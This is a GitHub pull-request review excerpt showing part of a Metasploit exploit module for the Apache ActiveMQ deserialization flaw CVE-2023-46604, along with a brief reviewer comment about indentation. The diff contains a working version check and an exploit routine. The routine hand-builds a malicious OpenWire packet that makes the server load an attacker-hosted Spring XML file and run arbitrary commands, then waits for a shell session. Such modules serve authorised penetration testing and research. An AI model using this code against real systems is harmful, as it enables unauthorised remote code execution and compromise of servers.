modules/exploits/multi/misc/apache_activemq_rce_cve_2023_46604.rb

```diff
@@ -0,0 +1,197 @@
+          # The maximum time in seconds to wait for a session.
+          'WfsDelay' => 30
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+  end
+
+  def check
+    connect
+
+    res = sock.get_once
+
+    disconnect
+
+    return CheckCode::Unknown unless res
+
+    len, _, magic = res.unpack('NCZ*')
+
+    return CheckCode::Unknown unless res.length == len + 4
+
+    return CheckCode::Unknown unless magic == 'ActiveMQ'
+
+    if res =~ /ProviderVersion...(\d+\.\d+\.\d+)/
+
+      version = Rex::Version.new(::Regexp.last_match(1))
+
+      ranges = [
+        ['5.18.0', '5.18.2'],
+        ['5.17.0', '5.17.5'],
+        ['5.16.0', '5.16.6'],
+        ['0.0.0', '5.15.15']
+      ]
+
+      ranges.each do |min, max|
+        if version.between?(Rex::Version.new(min), Rex::Version.new(max))
+          return Exploit::CheckCode::Appears("Apache ActiveMQ #{version}")
+        end
+      end
+
+      return Exploit::CheckCode::Safe("Apache ActiveMQ #{version}")
+    end
+
+    CheckCode::Detected
+  end
+
+  def exploit
+    start_service
+
+    connect
+
+    # The vulnerability allows us to instantiate an arbitrary class, with a single arbitrary string parameter. To
+    # leverage this we can use ClassPathXmlApplicationContext, and pass a URL to an XML configuration file we
+    # serve. This XML file allows us to create arbitrary classes, and call arbitrary methods. This is leveraged to
+    # run an attacker supplied command line via java.lang.ProcessBuilder.start.
+    clazz = 'org.springframework.context.support.ClassPathXmlApplicationContext'
+
+    # 31 is the EXCEPTION_RESPONSE data type.
+    data = [31].pack('C')
+    # ResponseMarshaller.looseUnmarshal reads a 4 byte int for the command id.
+    data << [0].pack('N')
+    # and a 1 byte boolean for response required.
+    data << [0].pack('C')
+    # ResponseMarshaller.looseUnmarshal read a 4 byte int for the correlation ID.
+    data << [0].pack('N')
+    # BaseDataStreamMarshaller.looseUnmarsalThrowable wants a boolean true to continue to unmarshall.
+    data << [1].pack('C')
+    # BaseDataStreamMarshaller.looseUnmarshalString reads a byte boolean and if true, reads a UTF-8 string.
+    data << [1].pack('C')
+    # First 2 bytes are the length.
+    data << [clazz.length].pack('n')
+    # Then the string data. This is the class name to instantiate.
+    data << clazz
+    # Same again for the method string. This is the single string parameter used during class instantiation.
+    data << [1].pack('C')
+    data << [get_uri.length].pack('n')
+    data << get_uri
+
+    sock.puts([data.length].pack('N') + data)
+
+    retry_until_truthy(timeout: datastore['WfsDelay']) do
+      !handler_enabled? || session_created?
+    end
+
+    handler
+  ensure
+    cleanup
+  end
+
+  def on_request_uri(cli, request)
+    if request.uri == get_resource
```

Comment:
```suggestion
    if request.uri != get_resource
      super
    end
```

Again here, to reduce nested indentation :)

Reply:
reduce indentation as suggested in [4272678](https://github.com/rapid7/metasploit-framework/pull/18501/commits/4272678938f7e9a2ade582dd6a24a9198d359b0a)